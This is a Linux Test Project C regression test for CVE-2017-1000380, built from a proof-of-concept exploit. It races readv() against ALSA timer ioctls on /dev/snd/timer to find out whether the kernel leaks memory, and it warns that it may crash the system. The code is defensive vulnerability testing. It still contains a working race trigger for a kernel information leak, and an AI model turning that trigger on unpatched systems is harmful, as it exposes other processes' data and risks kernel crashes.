1 // SPDX-License-Identifier: GPL-2.0-or-later
2 
3 /* Copyright (c) 2019 Michael Moese <mmoese@suse.com>
4  * Regression test for CVE-2017-1000380 based on the original PoC exploit
5  * by Alexander Potapenko <glider@google.com>
6  *
7  * Be careful! This test may crash your kernel!
8  *
 * The test performs several ioctl() calls in parallel with readv() on the
 * same file descriptor to /dev/snd/timer. A buggy kernel will leak memory
 * to the process, which may contain information from the kernel or from
 * any other process on the system.
13  *
14  * The issue was fixed with
15  *   http://git.kernel.org/linus/d11662f4f798b50d8c8743f433842c3e40fe3378
16  *   http://git.kernel.org/linus/ba3021b2c79b2fa9114f92790a99deb27a65b728
17  */
18 
19 #include "config.h"
20 #include "tst_test.h"
21 #include "tst_fuzzy_sync.h"
22 #include "tst_safe_macros.h"
23 #include "tst_safe_pthread.h"
24 
25 #include <errno.h>
26 #include <fcntl.h>
27 #include <pthread.h>
28 #include <stdio.h>
29 #include <string.h>
30 #include <sys/uio.h>
31 #include <sys/ioctl.h>
32 #include <sound/asound.h>
33 
/* Size of the readv() scratch buffer; run() reserves its last byte as a NUL. */
#define MAX_BUFSIZE 1024

/* Descriptor for /dev/snd/timer, opened in setup(); the zero default means "never opened". */
static int snd_fd;
/* Fuzzy-sync pair coordinating run() (side A) and ioctl_thread() (side B). */
static struct tst_fzsync_pair fzsync_pair;
38 
/*
 * Issue the four timer ioctls of one race window back to back.
 *
 * Return values are intentionally not checked: the calls exist only to
 * reconfigure the timer while the other thread is inside readv(); what
 * each of them returns individually is irrelevant to the test.
 */
static void timer_ioctl_burst(int *tread, struct snd_timer_select *sel,
			      struct snd_timer_params *params)
{
	ioctl(snd_fd, SNDRV_TIMER_IOCTL_TREAD, tread);
	ioctl(snd_fd, SNDRV_TIMER_IOCTL_SELECT, sel);
	ioctl(snd_fd, SNDRV_TIMER_IOCTL_PARAMS, params);
	ioctl(snd_fd, SNDRV_TIMER_IOCTL_START, 0);
}

/*
 * Side B of the fuzzy-sync pair: loops until tst_fzsync_run_b() returns
 * false, firing timer_ioctl_burst() inside each race window while run()
 * (side A) performs readv() on the same descriptor.
 *
 * @unused: pthread start-routine argument, handed back unchanged as the
 *          thread's return value.
 */
static void *ioctl_thread(void *unused)
{
	int enable_tread = 1;
	struct snd_timer_select sel;
	struct snd_timer_params params;

	/*
	 * Zero the whole objects (including any padding bytes) before they
	 * cross into the kernel, then set only the fields the PoC needs.
	 */
	memset(&sel, 0, sizeof(sel));
	memset(&params, 0, sizeof(params));
	sel.id.dev_class = 1;
	params.ticks = 1;
	params.filter = 0xf;

	while (tst_fzsync_run_b(&fzsync_pair)) {
		tst_fzsync_start_race_b(&fzsync_pair);
		timer_ioctl_burst(&enable_tread, &sel, &params);
		tst_fzsync_end_race_b(&fzsync_pair);
	}

	return unused;
}
62 
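/*
 * Open /dev/snd/timer and initialise the fuzzy-sync pair used by run().
 *
 * Reports TCONF via tst_brk() when the timer device node is absent
 * (presumably no ALSA timer support or an unpopulated /dev/snd), since the
 * race cannot be exercised without it. Note the access()/open() pair is
 * inherently a check-then-use window; it only decides TCONF vs. TBROK.
 */
static void setup(void)
{
	if(access("/dev/snd/timer", F_OK))
		tst_brk(TCONF, "The file '/dev/snd/timer' is not exist");

	tst_fzsync_pair_init(&fzsync_pair);

	/*
	 * Plain read-only open of an existing device node. O_CREAT is
	 * deliberately not passed: on an existing node it is a no-op, and if
	 * the node disappeared after the access() check it would create a
	 * mode-0 regular file under /dev/snd instead of failing. O_SYNC and
	 * O_LARGEFILE are harmless here and are kept as-is.
	 */
	snd_fd = SAFE_OPEN("/dev/snd/timer",
			O_RDONLY|O_NOCTTY|O_SYNC|O_LARGEFILE, 0);
}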
72 
/*
 * Close the timer descriptor if setup() actually opened it.
 *
 * snd_fd is a zero-initialised static, so a value of 0 means setup() bailed
 * out (TCONF) before SAFE_OPEN(); only strictly positive descriptors are
 * closed so that a bail-out never closes fd 0.
 */
static void cleanup(void)
{
	if (snd_fd <= 0)
		return;

	SAFE_CLOSE(snd_fd);
}
78 
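/*
 * Side A of the fuzzy-sync pair and the actual detector (LTP test_all).
 *
 * Starts ioctl_thread() detached, then races readv() on snd_fd against its
 * ioctl bursts inside the fuzzy-sync window. Whatever comes back is judged
 * with the heuristic inherited from the original PoC: a genuine struct
 * snd_timer_read is two unsigned ints, so a NUL-free run of bytes longer
 * than that is treated as memory leaked from the kernel.
 *
 * Caveats: strlen() stops at the first NUL, so a leak whose first nine bytes
 * contain a zero is not noticed; the kernel taint check after the loop is the
 * second signal. The buffer contents are deliberately never logged, since on
 * a vulnerable kernel they may hold data belonging to other processes.
 *
 * Outcome: TFAIL on a suspicious read or a tainted kernel, TPASS otherwise.
 */
static void run(void)
{
	ssize_t size, i;
	size_t len;
	int nz;
	struct iovec iov;
	pthread_t th;
	pthread_attr_t thread_attr;
	char read_buf[MAX_BUFSIZE];

	/*
	 * The ioctl thread is detached: it is never joined and ends on its
	 * own once tst_fzsync_run_b() stops returning true.
	 */
	pthread_attr_init(&thread_attr);
	pthread_attr_setdetachstate(&thread_attr, PTHREAD_CREATE_DETACHED);
	SAFE_PTHREAD_CREATE(&th, &thread_attr, ioctl_thread, NULL);
	/* The attribute object is only needed by the create call; release it. */
	pthread_attr_destroy(&thread_attr);

	/* Leave the last byte untouched so read_buf is always NUL-terminated. */
	iov.iov_base = read_buf;
	iov.iov_len = sizeof(read_buf) - 1;

	tst_fzsync_pair_reset(&fzsync_pair, NULL);
	while (tst_fzsync_run_a(&fzsync_pair)) {
		nz = 0;
		memset(read_buf, 0, sizeof(read_buf));

		tst_fzsync_start_race_a(&fzsync_pair);
		size = readv(snd_fd, &iov, 1);
		tst_fzsync_end_race_a(&fzsync_pair);

		/*
		 * Nothing to inspect: no data (0) or a failed read (-1). The
		 * read may fail while the other thread is reconfiguring the
		 * timer, so errno is not examined -- just try the next window.
		 */
		if (size <= 0)
			continue;

		/* An all-zero result cannot be a leak by this heuristic. */
		for (i = 0; i < size; i++) {
			if (read_buf[i]) {
				nz = 1;
				break;
			}
		}
		if (!nz)
			continue;

		/* The kernel's struct snd_timer_read is two unsigned integers. */
		len = strlen(read_buf);
		if (len <= 2 * sizeof(unsigned int))
			continue;

		tst_res(TFAIL, "kernel seems vulnerable");
		return;
	}

	if (tst_taint_check() != 0)
		tst_res(TFAIL, "kernel seems vulnerable");
	else
		tst_res(TPASS, "kernel seems not vulnerable");
}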
133 
/*
 * LTP test descriptor. The race is driven from run() (test_all), with
 * setup()/cleanup() opening and closing the timer descriptor around it.
 * taint_check selects the kernel taint flags the library watches for;
 * run() also polls them explicitly via tst_taint_check(). The tags link
 * the test to the two upstream fixes and the CVE named in the file header.
 */
static struct tst_test test = {
	.test_all = run,
	.setup = setup,
	.cleanup = cleanup,
	/* Taint flags that turn the run into a failure. */
	.taint_check = TST_TAINT_W | TST_TAINT_D,
	/* Upper bound for the race loop (LTP max_runtime; presumably seconds -- confirm). */
	.max_runtime = 150,
	.tags = (const struct tst_tag[]) {
		{"linux-git", "d11662f4f798"},
		{"linux-git", "ba3021b2c79b"},
		{"CVE", "2017-1000380"},
		{}
	}
};